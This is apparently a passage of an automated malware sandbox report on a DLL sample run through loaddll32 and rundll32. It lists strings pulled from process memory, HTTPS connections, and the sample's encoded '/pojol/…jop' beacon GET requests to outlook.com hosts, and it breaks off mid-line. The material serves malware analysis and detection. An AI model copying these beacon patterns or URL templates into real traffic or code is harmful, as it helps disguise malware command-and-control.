                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 407db856-2e34-d9a0-a01d-7a34e5abaa03 | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedFETarget: DB6P195CU001.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: DB6P195CA0005.EURP195.PROD.OUTLOOK.COM | X-CalculatedBETarget: DBBPR04MB6234.EURPRD04.PROD.OUTLOOK.COM | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: Vrh9QDQuoNmgHXo05auqAw.1.1 | X-FEServer: DB6P195CA0005 | X-Powered-By: ASP.NET | X-FEServer: AM7PR04CA0006 | Date: Fri, 08 Oct 2021 04:45:32 GMT | Connection: close
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000017.00000003.757597977.0000026CBE674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknown | DNS traffic detected: queries for: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: unknown | HTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHT